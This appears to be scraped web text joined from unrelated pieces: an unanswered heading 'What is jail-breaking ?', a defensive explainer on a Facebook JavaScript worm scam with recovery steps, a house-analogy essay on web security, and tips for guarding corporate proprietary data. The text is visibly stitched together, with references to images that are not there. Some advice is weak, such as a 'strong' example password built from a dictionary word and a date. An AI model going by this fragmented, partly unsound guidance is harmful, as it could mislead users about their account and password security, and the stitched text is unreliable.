What is jail-breaking ?

Consequences of running the javascript on your profile :

• It will update your facebook status plus it will post on your friends wall and it will spread the link of that scam website .
• The hacker will gain access to your personalized email something like ( 1233bhjkkoo@m.facebook.com ) through which you update your facebook status . Since sending an email to this email address will update your Facebook status anytime ,the hacker can update your Facebook Wall as long as you don’t change the email .
• Please remember after running the javascript ,the hacker won’t be getting your user id or password
• You will also automatically like some facebook fan pages due to this action of yours .

Here’s the solution to this if you got affected the worm created :

• You need to refresh your personalized email again so that the hacker don’t have access to your Facebook wall .
• Go the Facebook Mobile from here http://www.facebook.com/mobile/ .
• Scroll down to upload via email and you will find out and email address,that’s the email the hacker is using to update your Facebook account .
• Click on find out more .

• After this step you will find something like this :

• So, now refresh your personalized email .

• Since , you also might have liked some random facebook pages , so remove them manually by going through the tutorial we gave earlier for another facebook scam . You can also run a security scan on your facebook feed to check whether anyone sent you a malicious link or not .

On a new note some guys are bit more clever and they are using it with a different name like change your facebook theme or something similar . So, its better you don’t run javascripts on Facebook until and unless you yourself know what is contained in it .

Web security begins with a simple understanding of what the web is. Put simply, it’s a network, and networks connect different nodes (people) to each other through overlapping pathways (phone and cable lines).  That’s great for information you want to be able to send to anyone as efficiently as possible, but it also means that anyone has an efficient route to your electronic front door. You can check our must have free security softwares to make yourself more secure. So first things first, you need a front door:  a firewall.

A firewall is an electronic barrier.  Just like it sounds, it is not easy to get through.  Firewalls are software that can be downloaded and installed for free; many computers come with them pre-loaded.  The firewall tells neighbors and visitors to your computer that if they want to get inside they have to have a name-tag and take off their shoes and have brought pie–or an encryption signature.

Once you have a firewall installed, the next step is to use a safe browser.  A browser is the software which allows you to interact on the vast network of the internet.  It’s like your windows, in a way, because it gives you a vista on the entire world.  That’s great, when those windows are triple-paned and have locks.  But if you have open windows, your house isn’t very secure.  A good browser, like Mozilla’s Firefox browser or Google’s Chrome browser will allow you to access the internet but won’t let the internet access you and your information, at least not without permission. You can also use security addons for firefox to make your browser more secure .  I’d give Microsoft’s Internet Explorer browser a better grade, but it’s simply such a target for hackers that using it always entails a higher risk.

Ok, you have a front door and windows.  How about keys?  Did you make extra copies and give them to your friends?  Do the fisher-price keys that come with toy cashier sets fit into your locks?  Passwords are your keys.  You use passwords to enter secure areas, and it is important that your passwords be unique and not over-replicated.  Your password, simply put, should be something that only you know and that only you could guess.  Also, it should be something that only you would even think of.  The most common passwords, like ‘peace’, ‘love’, ‘hope’, ‘mother’, etc.  might make you feel good and be easy to remember, but they’re also easy to guess.  Check our guide on how to make strong password .

Here’s an example of a better password:  Love1984#2!, which is the date you met your second and current husband.  It’s long; it has symbols; it has numbers.  No one could guess it just by combining a top list of dictionary words.   Speaking of passwords, don’t write down your passwords and leave them posted to your laptop or office desk. You should also know about how to protect your passwords from hackers .  Having a nuclear-warfare grade key is pointless if you leave it on a park bench.  All of your passwords should be stored in an encrypted spreadsheet, loaded into a specialized program, or locked in that safe inside your head.

Here are three other tips for your consideration.  Lock your doors by using wireless encryption, set your alarm by keeping anti-virus and security software active and up to date, and don’t invite strangers into your house by visiting dangerous websites or downloading unknown software.  Your doors are great, but if you leave them open, they don’t do any good.  Having a great computer security system but then browsing over the internet on a wireless network which is not encrypted means that anyone can take a look inside to poke around. Free anti-virus and anti-malware software are your alarm system; they will tell you when someone who doesn’t belong has access to your computer and will remove the stuff they left behind.  But they only work if you install them, run them, and update them. Finally, don’t invite shady characters in.  When someone you don’t know sends you an email, or you visit a website that has warnings all over, don’t do it.  When you give approval to that software or site to access your computer, to share your info or to run a file on your computer, you have just let danger walk right past all of your precautions.

Web security is as simple as that.   You already have the house:  get a front door, good keys which you don’t leave lying around, lock the door, install secure windows, get an alarm system and set it, and don’t invite in strangers.  That’s it.  Common sense will keep you as safe online as you feel inside your danger-free abode.  Good luck!

The first step in protecting proprietary information is to restrict access to it by restricting access to the computer system as a whole. A good first step is to make all computers password protected so that only authorized personnel can access them. Computers should have an automatic security feature that blocks access to persons without a password if they are left unused for more than ten minutes.

An excellent second step is to restrict access to proprietary information only to those who actually need to see it. An example of this would be restricting access to new designs only to the engineers actually working on them.

Monitoring

Just as a company monitors entrance to its building, it should monitor computer use. This will enable supervisors to see who is accessing their computer system. Monitoring computers with proprietary information can enable a company to tell if somebody is accessing that data, or worse, sending it outside of the company.

A basic monitoring program should send a daily, weekly or monthly report detailing all individuals accessing proprietary data to the person in charge of a company’s security. It could even be programmed to immediately report unusual accesses of proprietary information.

Developing a protocol for access to proprietary information is often the first step in implementing this sort of system, which would also watch for unusual connectivity or threats such as viruses.

Outside Threats

In addition to internal threats, a serious concern will be outside threats such as viruses and worms that enter a system in search of proprietary data. Most of these can be detected by standard anti-virus or anti malware detection programs.

It is a good idea to run these sorts of anti-virus programs more frequently on computers or systems that contain proprietary data. If the data is very valuable I would recommending running anti-virus software once a day. An excellent time to do this would be every night after everybody has gone home for the evening. Keep in mind that new viruses and worms are released every day, so it is essential that your program be set up to automatically update otherwise you could find your anti-virus program woefully outdated.

It might also be a good idea to have an outside computer security firm regularly audit your security system and check for security problems. Such a checkup done on a monthly or bi-monthly basis could help you quickly identify threats and neutralize them.

Don’t let proprietary data leave the building.

Last, it is important that you keep strict tabs and limits on who, if anyone, is permitted to take computers outside the office. In other words, don’t put proprietary data on laptops, or even better, don’t let employees take company laptops out of the building!

By following the above steps you should be well on your way to keeping your company’s information safe and secure.
